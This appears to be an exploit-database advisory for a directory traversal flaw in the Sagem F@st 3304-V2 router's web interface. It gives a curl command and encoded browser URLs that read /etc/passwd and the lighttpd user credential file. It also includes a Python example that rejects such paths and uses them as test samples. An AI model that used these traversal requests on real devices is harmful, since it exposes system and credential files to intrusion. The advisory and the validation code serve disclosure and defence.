Sagem F@st 3304-V2 Directory Traversal Vulnerability

2015-03-02T00:00:00
ID 1337DAY-ID-23339
Type zdt
Reporter Loudiyi.MOhamed
Modified 2015-03-02T00:00:00

Description

Sagem Fast is an ADSL router that uses a web management interface to change configuration settings.

                                        
The vulnerability may be tested with the following command line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from a browser:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/ffs/A/lighttpd.user
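
The request paths above, run through the server-side check whose absence allows this class of bug: decode, canonicalize, then confirm the result is still under the document root. This is an added example, not code from the advisory or the router firmware; DOC_ROOT and the function names are assumptions, and the benign sample paths are constructed.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/var/www"  # assumption: hypothetical document root, not from the advisory


def decode_fully(raw_path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded separators (%252f) are caught."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def resolve_request(raw_path, doc_root=DOC_ROOT):
    """Return the canonical file path for a request, or None if it escapes doc_root."""
    path = decode_fully(raw_path)
    if "\x00" in path:  # embedded NUL can truncate the path in C file APIs
        return None
    # Join relative to the root, then collapse "//", "." and ".." segments.
    # A real server should also resolve symlinks (realpath) before comparing.
    candidate = posixpath.normpath(posixpath.join(doc_root, path.lstrip("/")))
    root = posixpath.normpath(doc_root)
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# The first three paths are the ones in the advisory; the rest are constructed.
SAMPLE_REQUESTS = [
    "//../../../../../../../../../../etc/passwd",
    "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/ffs/A/lighttpd.user",
    "/%252e%252e%252fetc/passwd",
    "/index.html",
    "/css/../index.html",
]


def audit(paths):
    """Map each raw request path to its resolved file, or None when rejected."""
    return {p: resolve_request(p) for p in paths}


if __name__ == "__main__":
    for raw, resolved in audit(SAMPLE_REQUESTS).items():
        print(("ALLOW  " + resolved) if resolved else "REJECT", raw)
```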

#  0day.today [2018-04-10]  #